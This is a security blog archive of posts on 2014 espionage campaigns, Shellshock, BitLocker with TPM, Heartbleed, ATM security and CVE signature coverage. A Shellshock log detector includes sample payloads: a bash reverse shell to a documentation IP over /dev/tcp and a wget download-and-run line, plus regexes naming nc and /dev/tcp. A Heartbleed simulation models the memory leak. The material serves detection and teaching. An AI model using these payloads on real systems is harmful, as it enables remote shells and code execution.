Category Archives: Security Essentials

2014 – Campaigns of Cyber Espionage

[In the article below, a summary of publicly disclosed cyber espionage campaigns released during 2014. An interesting read for those in the information security field. ~Luis]

In January 2014 the security software vendor Symantec published a report about a campaign of attacks that targeted the energy sector, Targeted Attacks Against the Energy Sector. According to its author, Candid Wueest: “The energy sector has become a major focus for targeted attacks and is now among the top five most targeted sectors worldwide. Companies in the sector are facing a growing risk of having their services interrupted or losing data.”

In February 2014 the Russian security software vendor Kaspersky released a report describing a series of attacks observed against 31 countries. The code name they used for the incidents was Careto: Unveiling “Careto” – The Masked APT. “The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name “Mask” comes from the Spanish slang word “Careto” (“Ugly Face” or “Mask”) which the authors included in some of the malware modules.”

During the same month the security company Trend Micro released its findings about the Russian underground. The report, Russian Underground Revisited, is the second part of a study initially released in 2012 that summarised the underground market: places on the Internet where cybercriminals converge to sell and buy products and services. Instead of creating their own attack tools from scratch, they can purchase what they need from peers who offer competitive prices.

A few months later Symantec described a series of attacks mainly against energy sector companies in Dragonfly: Cyberespionage Attacks Against Energy Suppliers. “A cyber espionage campaign against a range of targets, mainly in the energy sector, gave attackers the ability to mount sabotage operations against their victims. The attackers, known to Symantec as Dragonfly, managed to compromise a number of strategically important organizations for spying purposes and, if they had used the sabotage capabilities open to them, could have caused damage or disruption to the energy supply in the affected countries.”

June was the month when the security company CrowdStrike released its findings about a campaign code named Putter Panda. “CrowdStrike has been tracking the activity of a cyber espionage group operating out of Shanghai, China, with connections to the People’s Liberation Army Third General Staff Department (GSD) 12th Bureau Military Unit Cover Designator (MUCD) 61486, since 2012.”

In July another report from Kaspersky came forward, this time titled Energetic Bear – more like a Crouching Yeti. Kaspersky also released an appendix containing IOCs. “Energetic Bear/Crouching Yeti is an actor involved in several advanced persistent threat (APT) campaigns that has been active going back to at least the end of 2010.”

A report issued by CrowdStrike described a sophisticated attack against a large Fortune 500 company, campaign code name Deep Panda. “In late December 2011, CrowdStrike received three binary executable files that were suspected of having been involved in a sophisticated attack against a large Fortune 500 company. The files were analyzed to understand first if they were in fact malicious, and the level of sophistication of the samples.”

Also noteworthy is a report released by Airbus Defence & Space with the code name Operation Pitty Tiger – “The Eye of the Tiger”. The report contains information on a group of APT attackers known as “Pitty Tiger”. “This information comes directly from investigations led by our Threat Intelligence. Pitty Tiger is a group of attackers that have been active since at least 2011. They have targeted private companies in several sectors, such as defense and telecommunications, but also at least one government.”

Key findings about a campaign code named The Epic Turla Operation were released in August by Kaspersky, the result of 10 months of investigation into attacks against more than 45 countries. The company also released an appendix with IOCs. “Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call “Epic Turla”. The attackers behind Epic Turla have infected several hundred computers in more than 45 countries, including government institutions, embassies, military, education, research and pharmaceutical companies. The attacks are known to have used at least two zero-day exploits.”

Operation Arachnophobia was the code name for a campaign disclosed by the company ThreatConnect working in collaboration with FireEye. “We first discovered a suspected Pakistani threat group in 2013, and have since followed their activity and found new observations and insight into the group and its tactics that we call “Operation Arachnophobia”. Working in collaboration with FireEye Labs, the TCIRT team has discovered evidence pointing to this group’s continued exploitation operations using custom malware, dubbed BITTERBUG by FireEye.”

In October iSIGHT Partners released the details of a campaign code named Sandworm, a report that disclosed the use of a zero-day vulnerability against Western governments, NATO and the Ukrainian government. “iSIGHT Partners, in close collaboration with Microsoft, announced the discovery of a zero-day vulnerability impacting all supported versions of Microsoft Windows and Windows Server 2008 and 2012. Microsoft is making a patch for this vulnerability available as part of patch updates on the 14th – CVE-2014-4114. Exploitation of this vulnerability was discovered in the wild in connection with a cyber-espionage campaign that iSIGHT Partners attributes to Russia.”

During the same month the security software company Sophos released a report code named The Rotten Tomato Campaign. Gabor Szappanos, of SophosLabs Hungary, takes an interesting dive into the world of the attackers, examining the malware used in these attacks, and shows how several different groups used the same zero-day Microsoft Word exploit.

A series of attacks targeting companies in the defense industry was code named Operation Death Click and disclosed by Invincea. “Most targeted attacks against organizations originate as spear-phish campaigns or watering hole style web driveby attacks. Within the last six months, Invincea has discovered and stopped targeted malvertizing attacks against specific companies — particularly those in the Defense Industrial Base.”

A large-scale effort that targeted Fortune 500 companies, code named Operation SMN: Axiom Threat Actor Group Report, was disclosed by the software analytics company Novetta. The company also released extra resources ranging from static analysis of the malware to YARA signatures. “Axiom is responsible for directing highly sophisticated cyber espionage operations against numerous Fortune 500 companies, journalists, environmental groups, pro-democracy groups, software companies, academic institutions, and government agencies worldwide for at least the last six years.”

The Italian firm Tiger Security disclosed details about Operation Distributed Dragons. “Although it is no news that the way of performing attacks continuously changes shape and form, since January 2014 there has been evidence of a new “breed” of Chinese DDoS attacks based on the breach of Linux servers, whose objectives are not completely clear but significantly different from the approach so far experienced.”

A series of incidents targeting the United States and its allies using spear-phishing tactics was disclosed by Trend Micro: Operation Pawn Storm – Using Decoys to Evade Detection. “Operation Pawn Storm refers to economic and political espionage attacks instigated by a group of threat actors primarily targeting military, embassy, and defense contractor personnel from the United States and its allies.”

The German security software company G Data published the details of Operation “TooHash”. “The experts of G DATA’s SecurityLabs discovered a cyber-espionage campaign that perfectly exemplifies the way how targeted attacks work. The purpose of this campaign was to steal valuable documents from the targeted entity. We entitle this operation “TooHash”.”

Still in October the security software vendor FireEye published a report on a Russian cyber espionage group: APT28: A Window into Russia’s Cyber Espionage Operations? “In this paper we discuss a threat group whose malware is already fairly well-known in the cybersecurity community. This group, unlike the China-based threat actors we track, does not appear to conduct widespread intellectual property theft for economic gain. Nor have we observed the group steal and profit from financial account information.”

Last week the details of a campaign code named the Darkhotel APT were released by Kaspersky: facts about attackers that have been active for at least seven years, conducting targeted strikes against guests at luxury hotels in Asia as well as infecting victims via spear-phishing attacks and other mechanisms. The company also released an appendix with IOCs. “The Darkhotel APT is a threat actor possessing a seemingly inconsistent and contradictory set of characteristics, some advanced and some fairly rudimentary.”


ShellShock – Highlights

On Wednesday, 24 September, Florian Weimer from the Red Hat security team publicly announced on the Open Source Security mailing list a vulnerability in GNU Bash discovered by Stephane Chazelas. An hour later he released a patch and the technical details of the vulnerability: “an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation”. Essentially it is a command injection vulnerability that allows remote code execution: Bash imported a function definition from any environment variable whose value started with “() {”, and kept parsing, and executing, whatever followed the closing brace of the function body. Meanwhile some news sites were already publishing details. This was not altogether comfortable, since the details were disclosed before the end of the embargo that had been put together to give vendors time to patch before it went public. The vulnerability got CVE-2014-6271 with a CVSS score of 10 and a low access complexity, which means it is easy to exploit. It affected all Bash versions from 1.14 through 4.3. The attack vectors as described by US-CERT include:

  • Apache HTTP Server using mod_cgi or mod_cgid scripts that are either written in Bash, or spawn GNU Bash subshells, or run on any system where the /bin/sh interface is implemented using GNU Bash.
  • Override or bypass of the ForceCommand feature in OpenSSH sshd, and of the limited protection for some Git and Subversion deployments used to restrict shells, allowing arbitrary command execution. This data path is vulnerable on systems where the /bin/sh interface is implemented using GNU Bash.
  • Arbitrary commands run on a DHCP client machine, since the DHCP client passes server-supplied options to its hook scripts through environment variables.

From the attack vectors described, HTTP requests to CGI scripts were identified as the major concern. While the news was still spreading, on 25 September, when people were rushing to patch, Tavis Ormandy showed that the patch was incomplete and the vulnerability was still exploitable. This was identified as CVE-2014-7169, also with a CVSS score of 10, and was patched on Friday the 26th. Meanwhile another two vulnerabilities were discovered by Todd Sabin, harder to pull off but still critical; they got CVE-2014-7186 and CVE-2014-7187. In the meantime Michal Zalewski, another brilliant security researcher who works with Tavis on the Google security team, found two additional vulnerabilities. He gave the details privately in order to give time to patch, and disclosed them on 1 October. These last two got CVE-2014-6277 and CVE-2014-6278. The latest patches from the vendors mitigate all six vulnerabilities. Below is a timeline of the key dates during this rush week.


During the rush hours of the disclosure, Robert Graham from Errata Security started massively scanning the Internet looking for vulnerable hosts. The results were impressive. Troy Hunt also wrote a nice summary about it. While security researchers, vendors and corporations were working together to assess and mitigate the risk of this vulnerability, evil started to show its fingers: attacks attempting to exploit the vulnerability began. Rapid7 weaponized the exploit into Metasploit. Due to the large number of attacks seen, SANS raised its INFOCON level to Yellow on the 26th; Johannes Ullrich wrote a great summary about it. Among the exploitation techniques seen were automated click fraud, reverse shell attempts, all kinds of recon activity, Perl bots and others. Trend Micro released a comprehensive technical report. FireEye wrote a great summary of the exploit techniques seen in the wild.
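Since the CGI vector was the one most exploited, a practical first step in the incident response of that week was to search web server logs for the function-export prefix that Bash reacts to. The following detector is added here as an example; it is not code from the original post nor from any of the vendors mentioned. It runs over a few constructed Apache combined-format log lines (RFC 5737 documentation addresses, not real traffic) and buckets each payload into the categories observed in the wild: reverse shells, download-and-execute bots and recon. The bucket regexes are an assumption made for illustration, not a vendor signature set.

```python
import re
from collections import Counter

# Apache/NCSA "combined" log format. The sample lines below are constructed for
# this example, with RFC 5737 documentation addresses; they are not real traffic.
SAMPLE_LOG = r'''
192.0.2.10 - - [25/Sep/2014:10:01:22 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"
192.0.2.11 - - [25/Sep/2014:10:02:05 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "() { :; }; /bin/bash -c 'wget http://203.0.113.5/x.pl -O /tmp/x.pl; perl /tmp/x.pl'" "Mozilla/5.0"
192.0.2.12 - - [25/Sep/2014:10:03:40 +0000] "GET / HTTP/1.1" 200 1024 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1'"
198.51.100.20 - - [25/Sep/2014:10:04:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1)"
'''.strip().splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Bash only imported a function from the environment when the value started
# with "() {"; mod_cgi copies request headers into the environment as
# HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE, ..., so that prefix in any header
# is the signature. Whitespace is loosened to also catch "(){" spacing variants.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Crude intent buckets (an assumption for this example), checked in priority
# order; the first match wins.
CATEGORIES = (
    ("reverse_shell", re.compile(r'/dev/tcp/|\bnc\b|bash -i')),
    ("download_exec", re.compile(r'\b(wget|curl|perl|python)\b')),
    ("recon", re.compile(r'\b(ping|echo|id|uname|cat)\b')),
)


def classify_payload(payload):
    """Return the first matching intent bucket for a Shellshock payload."""
    for name, pattern in CATEGORIES:
        if pattern.search(payload):
            return name
    return "unknown"


def scan_log(lines):
    """Return one finding per log line that carries a Shellshock payload."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.rstrip("\r\n"))
        if not m:
            continue  # not combined format; a real job would count these
        for field in ("referer", "ua", "req"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                findings.append({
                    "line": lineno,
                    "src": m.group("ip"),
                    "field": field,
                    "category": classify_payload(value),
                    "payload": value,
                })
                break  # one finding per line is enough for triage
    return findings


def summarize(findings):
    """Count findings per intent bucket."""
    return Counter(f["category"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(f'line {hit["line"]}: {hit["src"]} via {hit["field"]} -> {hit["category"]}: {hit["payload"]}')
    print(dict(summarize(hits)))
```

Only the Referer, User-Agent and request line are inspected because those are what the combined format records; Cookie and other custom headers also reached the CGI environment, so a full-header capture (or a WAF rule on every header) is needed to see those.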


Hands on Training to develop cyber security skills

The demand for qualified security professionals who possess the required skills and relevant education is increasing substantially. However, the supply is not meeting the demand. The information security industry is growing in size, density and specialization. Across all businesses we need people who understand computer systems, networks and security. In order to help facilitate the growth of these information security skills, hands-on training (H.O.T.) can be used to make sure that our abilities have been tested in the most realistic way possible. This paper will show how to build an environment that represents real-world security issues and their respective flaws. Topics such as incident handling, intrusion analysis, system administration, network security, forensics or penetration testing can be taught and practiced. Among other objectives, the primary goal is to grow security expertise and awareness by using a low-cost, high-return and self-paced hands-on training method that allows us to understand attack methods in order to create effective defenses.

This is the abstract of my paper that was just released on the SANS Reading Room as part of my journey to get the GIAC GCIH Gold certification. I started drafting the idea of writing a paper last October. The experience was interesting, sometimes frustrating, long but with lots of fun. Essentially, I prepared all my ideas in the lab and practiced the different scenarios I wanted to share so they could be repeatable and consistent in order to be documented. In parallel I started to write some notes, do research and find references. Around last December I submitted the first draft to SANS. They accepted the paper and assigned an advisor to work with me. From that moment onwards I had a deadline of 6 months. A series of back and forth with the advisor followed. I must admit that Dr. Johannes Ullrich from SANS was very supportive, responsive and a great mentor during the whole process. I would also like to thank Angel Parrizas for his constructive feedback during the paper creation and thoughts on the structure, Michael Bem for his help with the opening language, Grzegorz Drozda in the beginning with his SQL kung-fu and, finally, my family, who had a lot of patience to deal with the long hours at the computer.

My biggest challenge was the language in terms of structure, phrasing, diction, subject-verb agreement and tense, since English is a second language for me. I believe that to create a paper like this you need strong motivation, willingness, persistence and family support, but it is a rewarding experience that allowed me to share my experiences, learn, reinforce my knowledge and contribute to the community. I definitely recommend this exercise to anyone who is involved in the security industry.

The paper is available here!


BitLocker with TPM in 10 Steps.

Starting with Windows Vista, Microsoft used a secure development lifecycle from start to finish. By introducing these software development practices, Microsoft built better software using secure design, threat modeling, secure coding, security testing and best practices surrounding privacy. One of the many features introduced was BitLocker drive encryption. It encrypts the full contents of a volume and is designed to work with a Trusted Platform Module (TPM) security device. By encrypting the drive contents you add an additional layer of protection that helps defend against evil maid attacks, offline attacks and disclosure of data when a laptop is lost or stolen. Windows 7 brought more enhancements to this technology that will drive its adoption: it is more user friendly, supports BitLocker To Go (protects removable media) and reduces the administration overhead, e.g. it does not require an admin to lay out the hard drive partitions in a special way (now you know why on Windows 7 you might see a 100 MB NTFS volume: this small unencrypted system partition holds the boot files so that the BIOS can locate and run bootmgr). BitLocker can work with or without a TPM. A TPM is a tamper-resistant security chip on the system board that holds the key for encryption and checks the integrity of the boot sequence: it releases the key only when the measured boot components match the values recorded when BitLocker was enabled, which allows the most secure BitLocker implementation. BitLocker needs a TPM chip version 1.2 or higher, enabled in the BIOS. Without a TPM, BitLocker can store its startup key on a USB drive that is read during the boot sequence. BitLocker encrypts the contents of the hard drive using AES128-CBC (by default) or AES256-CBC, with a Microsoft-specific extension called a diffuser. To run BitLocker you need Windows 7 Enterprise or Ultimate edition. When configuring BitLocker you have a number of options:

  • TPM Only: no user authentication required for the boot sequence; the TPM releases the key only if the boot measurements are intact, which protects against offline attacks, and it is the most transparent method for the user. Note that nothing stops an attacker from booting the machine to the logon screen.
  • TPM with PIN: adds a “what you know” factor to the boot process; the user is prompted for a PIN.
  • TPM with USB: adds a “what you have” factor to the boot process; the user needs to insert the USB key that contains the startup key.
  • TPM with USB and PIN: the most secure mode, using two-factor authentication for the boot process, but the most costly in terms of support, e.g. when a user loses the USB key or forgets the PIN.
  • Without TPM: does not provide the pre-boot integrity protection and uses a USB key to store the startup key.

How to enable BitLocker with TPM in 10 Steps?

  1. Determine if your computer has support for TPM 1.2.
  2. Enable TPM in the BIOS settings.
  3. On Windows launch the TPM management console (tpm.msc).
  4. Initialize it and create an owner password.
  5. Save and print the password.
  6. Define Group Policy settings to ensure a TPM is used with BitLocker and define the authentication method.
  7. Turn on BitLocker on the desired hard drive.
  8. Define the authentication method.
  9. Save and print the recovery key.
  10. Encrypt the drive.

Let’s review each one of these steps into more detail.

Step 1: To determine if your computer has TPM support, check your computer model documentation or check the BIOS directly. In my case I had a second-hand Dell Latitude E6400 laptop with TPM capabilities.

Step 2: I went into the BIOS and enabled the TPM Security option.

Step 3: I booted Windows and opened the TPM management console by running tpm.msc.

Step 4: In the TPM management console, click Initialize. This starts the process where you either create a password manually or have one generated. In this case I chose to create the TPM owner password automatically.

Step 5: Save the password file (file.tpm) to a USB drive and print the password for recovery purposes. Keep this file in a secure location away from your computer’s local hard drive.

Step 6: On Windows run gpedit.msc to open the Group Policy Editor. Provide administrator credentials if you have UAC configured. Navigate to Computer Configuration – Administrative Templates – Windows Components – BitLocker Drive Encryption – Operating System Drives: Require Additional Authentication at Startup. Enable this setting and, under options, verify that Allow BitLocker Without a Compatible TPM is unchecked. I left the remaining settings at their defaults, but this is where you configure two-factor authentication for the boot process (e.g. require a startup PIN with the TPM instead of merely allowing it).

Step 7: Select the drive you want to encrypt, right-click and choose Turn On BitLocker.

Step 8: The options you defined in Group Policy appear here so that you can choose the authentication method; in this case I selected TPM with PIN.

Step 9: Save the recovery key to a USB drive and print it for recovery purposes. The recovery key is used to recover the data on a BitLocker-protected drive when the normal unlock method is not available.

Step 10: Finally, encrypt the drive and select “Run BitLocker system check” so that BitLocker verifies it can read the recovery and encryption keys correctly before encryption starts.



When you reboot, you are prompted with the Windows BitLocker Drive Encryption PIN entry screen, where you must supply the PIN before the operating system starts.

In terms of management, BitLocker settings can be configured and checked with the manage-bde.exe command line tool (e.g. manage-bde -status). For domain-joined systems the recovery key of each machine can be backed up to Active Directory as a key escrow. This way business owners such as legal teams can gain access to the machine if the user loses the USB key or PIN, or when an insider threat requires it. Another method is a data recovery agent (DRA): a certificate that can be used to unlock the encrypted volumes. There are also several other Group Policy settings that can be configured.
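Once the ten steps are done, the quickest way to confirm the result (and to audit a fleet) is to parse the output of manage-bde -status. The following Python script is added here as an example; it is not part of the original post nor of Microsoft’s tooling. It parses a constructed sample of that output (the layout follows the Windows 7 tool, the values are made up) and checks that the OS volume is fully encrypted, has protection on, carries a TPM+PIN startup protector and has a numerical recovery password. On a real machine you would feed it the actual command output, as the comment in the main block shows.

```python
import re

# Constructed sample of "manage-bde -status" output for this example (the layout
# follows the Windows 7 tool, but the values are made up, not from a real host).
SAMPLE_STATUS = """\
BitLocker Drive Encryption: Configuration Tool version 6.1.7601
Copyright (C) Microsoft Corporation. All rights reserved.

Volume C: [OS]
[OS Volume]

    Size:                 232.40 GB
    BitLocker Version:    Windows 7
    Conversion Status:    Fully Encrypted
    Percentage Encrypted: 100%
    Encryption Method:    AES 128 with Diffuser
    Protection Status:    Protection On
    Lock Status:          Unlocked
    Identification Field: None
    Key Protectors:
        TPM And PIN
        Numerical Password

Volume D: [Data]
[Data Volume]

    Size:                 100.00 GB
    BitLocker Version:    None
    Conversion Status:    Fully Decrypted
    Percentage Encrypted: 0%
    Encryption Method:    None
    Protection Status:    Protection Off
    Lock Status:          Unlocked
    Identification Field: None
    Key Protectors:       None Found
"""

VOLUME_RE = re.compile(r'^Volume (?P<letter>[A-Z]): \[(?P<label>[^\]]*)\]')
FIELD_RE = re.compile(r'^ {4}(?P<key>[^:]+):\s*(?P<value>.*)$')
PROTECTOR_RE = re.compile(r'^ {8}(?P<name>\S.*)$')

# What the procedure on this page ends with: TPM + PIN at boot (Step 8) and a
# saved/printed recovery key, listed by manage-bde as "Numerical Password" (Step 9).
STARTUP_PROTECTORS = {"TPM And PIN", "TPM And PIN And Startup Key"}
RECOVERY_PROTECTOR = "Numerical Password"


def parse_status(text):
    """Parse manage-bde -status output into {letter: {field: value, "protectors": [...]}}."""
    volumes, current = {}, None
    for line in text.splitlines():
        vm = VOLUME_RE.match(line)
        if vm:
            current = {"label": vm.group("label"), "protectors": []}
            volumes[vm.group("letter")] = current
            continue
        if current is None:
            continue  # banner lines before the first volume
        pm = PROTECTOR_RE.match(line)
        if pm:  # protector names are indented one level deeper than fields
            current["protectors"].append(pm.group("name").strip())
            continue
        fm = FIELD_RE.match(line)
        if fm:
            key, value = fm.group("key").strip(), fm.group("value").strip()
            if key == "Key Protectors":
                if value and value != "None Found":
                    current["protectors"].append(value)
            else:
                current[key] = value
    return volumes


def check_os_volume(volumes, letter="C"):
    """Return the list of policy violations for a volume (empty list == compliant)."""
    vol = volumes.get(letter)
    if vol is None:
        return [f"volume {letter}: not reported by manage-bde"]
    problems = []
    if vol.get("Protection Status") != "Protection On":
        problems.append(f"volume {letter}: protection is not on")
    if vol.get("Conversion Status") != "Fully Encrypted":
        problems.append(f"volume {letter}: not fully encrypted")
    if not STARTUP_PROTECTORS.intersection(vol["protectors"]):
        problems.append(f"volume {letter}: no TPM+PIN startup protector")
    if RECOVERY_PROTECTOR not in vol["protectors"]:
        problems.append(f"volume {letter}: no numerical recovery password")
    return problems


if __name__ == "__main__":
    # On a real host, replace SAMPLE_STATUS with:
    # subprocess.run(["manage-bde", "-status"], capture_output=True, text=True).stdout
    vols = parse_status(SAMPLE_STATUS)
    for letter in sorted(vols):
        print(letter, vols[letter]["protectors"], check_os_volume(vols, letter) or "OK")
```

The data volume D in the sample is reported as decrypted on purpose, so the check lists every violation for it; in a fleet audit you would only apply the startup-protector rule to the OS volume and a weaker rule (auto-unlock or password) to data volumes.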

The recovery process is also easy if you have the USB drive or the printed recovery key. Note that if during boot the system detects a change to the boot environment, such as a different hard drive or a BIOS change/upgrade, the TPM will not release the key and you will be asked for the recovery key. Other than full volume encryption, BitLocker To Go is also a great way to encrypt removable hard disks and thumb drives.

As you can see, it is extremely easy to add an additional layer of protection to your system. If you have a Windows 7 Enterprise or Ultimate license then this is a great feature to keep the family photos and your wife’s cooking trade secrets from falling into the wrong hands.



Windows Internals, Sixth Edition, Part 2 By: Mark E. Russinovich, David A. Solomon, and Alex Ionescu



Heartbleed – OpenSSL Bug

This has been an extremely crazy week for the security community!

“The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop communications, steal data directly from the services and users and to impersonate services and users”

OpenSSL published an advisory for the bug, named Heartbleed and classified as CVE-2014-0160, which was discovered by Neel Mehta and Codenomicon. An estimated 500k widely trusted websites were (and some still are) impacted. Bruce Schneier described it as a catastrophic bug. SANS raised its INFOCON threat level to Yellow and made two great webcast briefings, here and here, and maintains a list of vendors and their respective patches. If you want to find out whether your website or appliance is vulnerable, Jared Stafford created a PoC, and several sites provide a way to test it, including Qualys and a site created by Filippo Valsorda here. Brian Krebs and Ed Felten provide a great overview of what to do to mitigate it. Sean Cassidy wrote great technical details here. The Bitcoin Core software was updated. Tomas Rzepka (@1njected) managed to retrieve the private keys from a FreeBSD 10 system. Mark Loman showed how Yahoo was affected. Matthew Sullivan showed how the leaked data could be used to hijack web sessions, with more examples here and here. A scanner was quickly incorporated into Metasploit. Many other resources are here. Cloudflare set up a challenge in case you want to try it out and get their private keys. Finally, you might want to consider changing your passwords if you have an account on the following sites.

“OpenSSL’s security advisory states that only versions 1.0.1 and 1.0.2-beta are affected, including 1.0.1f and 1.0.2-beta1. The vulnerability has been fixed in OpenSSL 1.0.1g, and users who are unable to upgrade immediately can disable heartbeat support by recompiling OpenSSL with the -DOPENSSL_NO_HEARTBEATS flag.
Certificates and keys at risk of compromise should be revoked and replaced, particularly if they are used to protect sensitive data”
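The bug itself is a missing bounds check in OpenSSL’s handling of the TLS heartbeat extension (RFC 6520): the peer states how long its payload is, and the server copied that many bytes from memory into the reply without checking the claim against the record it had actually received. The following Python simulation is added here as an example; it is not OpenSSL’s code nor code from the original post. It models a heartbeat record, the pre-1.0.1g handling and the 1.0.1g length check, against a constructed stand-in for the neighbouring heap memory (made-up data).

```python
import struct

# TLS Heartbeat (RFC 6520) message: type(1) | payload_length(2) | payload | padding(>=16)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16

# Constructed stand-in for whatever sat in the OpenSSL process heap right after
# the heartbeat record: here, another user's request. Not real data.
NEIGHBOUR_HEAP = (
    b"POST /login HTTP/1.1\r\nCookie: session=abc123\r\n\r\n"
    b"user=alice&password=hunter2"
)


def build_heartbeat(claimed_length, payload=b""):
    """Build a heartbeat request; claimed_length larger than len(payload) is the attack."""
    return bytes([HB_REQUEST]) + struct.pack("!H", claimed_length) + payload + b"\x00" * MIN_PADDING


def heartbeat_vulnerable(record, heap_after_record):
    """OpenSSL 1.0.1 through 1.0.1f: trust the length field and memcpy that many bytes."""
    payload_len = struct.unpack("!H", record[1:3])[0]
    memory = record + heap_after_record      # what follows the record in memory
    payload = memory[3:3 + payload_len]      # no check against the record length
    return bytes([HB_RESPONSE]) + struct.pack("!H", payload_len) + payload + b"\x00" * MIN_PADDING


def heartbeat_fixed(record, heap_after_record):
    """OpenSSL 1.0.1g: discard the message unless the claimed payload fits in the record."""
    record_len = len(record)
    if 1 + 2 + MIN_PADDING > record_len:
        return None                           # too short to be a valid heartbeat
    payload_len = struct.unpack("!H", record[1:3])[0]
    if 1 + 2 + payload_len + MIN_PADDING > record_len:
        return None                           # RFC 6520: silently discard
    payload = record[3:3 + payload_len]      # heap_after_record is never touched
    return bytes([HB_RESPONSE]) + struct.pack("!H", payload_len) + payload + b"\x00" * MIN_PADDING


def response_payload(response):
    """Extract the payload bytes echoed back in a heartbeat response."""
    payload_len = struct.unpack("!H", response[1:3])[0]
    return response[3:3 + payload_len]


def leaked_bytes(response, sent_payload):
    """Everything the responder echoed beyond what the client actually sent."""
    return response_payload(response)[len(sent_payload):]


if __name__ == "__main__":
    honest = build_heartbeat(2, b"hi")
    attack = build_heartbeat(1024, b"hi")    # claims 1024 bytes, sends 2
    print("honest/fixed :", response_payload(heartbeat_fixed(honest, NEIGHBOUR_HEAP)))
    print("attack/vuln  :", leaked_bytes(heartbeat_vulnerable(attack, NEIGHBOUR_HEAP), b"hi"))
    print("attack/fixed :", heartbeat_fixed(attack, NEIGHBOUR_HEAP))
```

The leaked bytes start with the request’s own padding and then continue into whatever the heap held next, which is why repeated requests with a 64 KB claim eventually turn up cookies, passwords and private key material.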


Could we ask John Connor to bring his Atari and bypass this?

Automated Teller Machines (ATMs) are devices that provide the customers of a financial institution with the ability to perform financial transactions [1]. They are available everywhere and often use well-known operating systems and off-the-shelf hardware. Last Christmas, while on vacation and walking through the beautiful city of Lisbon, I came across the ATM shown in the picture.

An ATM running the Windows NT operating system! By now ATMs should be running at least Windows XP Embedded, if not Windows 7 Embedded!

Without a doubt the most common ATM attacks involve card skimmers. An excellent resource on card skimmers is the series that Brian Krebs put together, “All About Skimmers”. It is definitely an eye-opener and excellent for raising awareness. Other attack techniques are card trapping, PIN cracking, phishing and malicious software [2]. However, when I saw this ATM I immediately remembered Barnaby Jack and his DEF CON presentation Jackpotting Automated Teller Machines. It’s like Terminator 2, where John Connor uses his Atari to bypass security on an ATM with a ribbon cable connecting the parallel interface to a magnetic stripe card. Fiction apart, these kinds of attacks are very real. For example, this one seen in Mexico, or Troj/Skimer-A with an in-depth analysis by XyliBox. Another interesting report is this one from Trustwave, which shows a piece of malware that targets ATMs running Windows XP. The Diebold ATM Security Communication and Support Center has good information about all kinds of attacks, like the one seen in Russia where an insider would install the malicious code on several ATMs running Windows XP Embedded and then use a special activation card that allowed complete control of the ATM.

Would you withdraw money from an ATM  running Windows NT?

[1-2] Mubarak Al-Mutairi; Lawan Mohammed ; IGI Global ; Cases on ICT Utilization, Practice and Solutions.


CVE November Awareness Bulletin

[Following the previous month’s CVE Awareness Bulletin, below is the November release]

The CVE November Awareness Bulletin is an initiative that aims to provide further intelligence and analysis concerning the latest vulnerabilities published in the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) and the IDS vendors’ coverage of these vulnerabilities.

Common Vulnerabilities and Exposures (CVE) is a public list of common names made available by MITRE Corporation for vulnerabilities and exposures that are publicly known.

This is the most popular list of vulnerabilities and is used as a reference across the whole security industry. It should not be considered absolute, but due to the nature of its mission and its current sponsors, the Department of Homeland Security (DHS) and the National Cybersecurity and Communications Integration Center (NCCIC), it is widely adopted across the industry.

Based on this public information I decided to take a look at what was released during the month of November. There were 389 vulnerabilities published, of which 56 were issued with a Common Vulnerability Scoring System (CVSS) score of 8 or higher. CVSS provides a standardized method for rating vulnerabilities, using a score from 0 to 10 based on their different properties. For these vulnerabilities I compared the latest signature updates available from products that have a significant share of the market, i.e. Check Point, TippingPoint, Sourcefire, Juniper, Cisco and Palo Alto. The result is that Sourcefire has the best coverage with 23%. TippingPoint, Check Point and Juniper rank second with 16%. Cisco ranks third with 12%, followed by Palo Alto with 0%.

The following graph illustrates the mapping between the CVEs published in November with a CVSS equal or higher than 8 by vulnerability type and the vendor coverage:


In addition to looking at all the vulnerabilities released, it is also essential to look in detail at specific coverage, such as Microsoft product vulnerabilities. On 12 November the Microsoft Security Bulletin (a.k.a. Patch Tuesday) announced 25 vulnerabilities, 12 of which have a CVSS score of 8 or higher. The vendor coverage for these is shown in the following table:


The vendors analyzed provided signatures on the same date (12 November) or a few days later. The signatures and patches mentioned should be applied as soon as possible, but you should also fully evaluate them (when possible) before applying them to production systems.

In addition, following a signature update deployment, you should always check which signatures have been enabled by default. You should also evaluate the impact in your environment of the CVEs that don’t have coverage.

Bottom line, the vendors analyzed have a quick response, but the coverage should be broader. In November we saw 56 vulnerabilities with a CVSS of 8 or higher, but only 23% of them have coverage in the best case (Sourcefire). This means 77% of the published vulnerabilities don’t have coverage. Regarding the vendor response to the Microsoft Security Bulletin Summary for November 2013, the coverage is better and goes up to 100% in the best case (Sourcefire). It is interesting to note that some of these vulnerabilities are in software that does not have a significant market share, so even if the vendors had 100% coverage it would not apply to all environments. Furthermore, the likelihood of these vulnerabilities being successfully exploited should also be considered, since some of them could be very hard to pull off. So it is key that you know your infrastructure, your assets and, above all, where your business crown jewels are. Then you can better protect your intellectual property and determine what the impact would be if it gets disclosed, altered or destroyed.
